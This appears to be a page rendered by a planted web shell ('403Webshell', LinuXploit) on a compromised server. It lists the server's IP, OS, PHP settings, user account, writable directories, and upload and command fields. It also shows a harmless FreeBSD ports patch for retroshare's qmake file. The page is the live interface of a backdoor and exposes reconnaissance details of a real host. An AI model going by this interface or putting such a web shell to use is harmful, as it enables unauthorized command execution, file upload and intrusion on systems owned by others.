403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.168
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/net-p2p/retroshare/files/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/net-p2p/retroshare/files/patch-libresapi_src_libresapi.pro
--- libresapi/src/libresapi.pro.orig	2017-10-20 20:57:46 UTC
+++ libresapi/src/libresapi.pro	
@@ -160,9 +160,20 @@
 		api/ApiServerMHD.h
 }

+freebsd-clang {
+	JSON_SOURCES = api/json.cpp
+	json.name = json
+	json.input = JSON_SOURCES
+	json.variable_out = OBJECTS
+	json.dependency_type = TYPE_C
+	json.output = ${QMAKE_VAR_OBJECTS_DIR}${QMAKE_FILE_IN_BASE}$${first(QMAKE_EXT_OBJ)}
+	json.commands = $${QMAKE_CXX} $(CXXFLAGS) -std=gnu++98 $(INCPATH) -c ${QMAKE_FILE_IN} -o ${QMAKE_FILE_OUT}
+	QMAKE_EXTRA_COMPILERS += json
+}
+
+
 SOURCES += \
 	api/ApiServer.cpp \
-	api/json.cpp \
 	api/JsonStream.cpp \
 	api/ResourceRouter.cpp \
 	api/PeersHandler.cpp \


Youez - 2016 - github.com/yon3zu
LinuXploit